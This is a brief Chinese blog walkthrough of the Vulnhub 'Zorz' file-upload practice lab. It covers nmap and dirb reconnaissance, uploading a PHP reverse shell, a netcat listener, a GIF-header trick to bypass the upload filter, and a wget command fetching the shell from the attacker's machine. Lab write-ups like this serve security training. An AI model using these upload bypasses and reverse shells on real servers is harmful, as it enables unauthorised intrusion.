Vulnhub-Zorz
(0)


[注:这是一篇文件上传的练习靶场]
获取目标 IP 地址:nmap -sn 192.168.67.1/24 ---> 192.168.67.68

获取目标信息:nmap -A -p- 192.168.67.68 ---> 22 SSH || 80 HTTP

照常 dirb 跑一下目录[这里建议每次都用大字典跑]:dirb http://192.168.67.68/ /usr/share/wordlists/dirb/big.txt
浏览器浏览:http://192.168.67.68

直接把 php-reverse-shell.php 上传到服务器:
cp /usr/share/webshells/laudanum/php/php-reverse-shell.php .
修改下反弹主机 IP 和端口,成功上传:

第一关卡

接下来就是寻找上传到了哪个目录,看看 dirb 爆破的结果,看到一个 uploads2

查看下这个目录,啥都没有:

尝试下 uploads1,这次可以看到目录啦:

获取反弹 shell 先 nc -vnlp 8686

进去以后查看下目录,发现有个 l337saucel337 目录,再进去看看,可以发现有个名为 SECRETFILE 文件:
cat SECRETFILE

告诉我们一共有三个上传点,前两个是 php,后者是一个 jquery 上传点,那我们继续来进行第二个,不懂的地方就偷偷看看源码

第二关卡

继续上传刚刚那个 php 反弹文件,然后提示:

尝试在 php 最前面加上个 GIF 的标识,把文件名后缀改成 .gif [这些东西基本上被杀的差不多了吧...]

getshell :wget http://192.168.67.56/php-reverse-shell.php 下载 php 到目录然后执行


学习下源码:

第三关卡

对类型和大小都做了限制
因为 VPS 到期了,还没去搞,页面访问不了,但是文件上传的练习我们已经做了很多了,这里就不再详细赘述了... :D

本文为作者HD_More发布,未经允许禁止转载!
上一篇 下一篇
评论
暂无评论 >_<
加入评论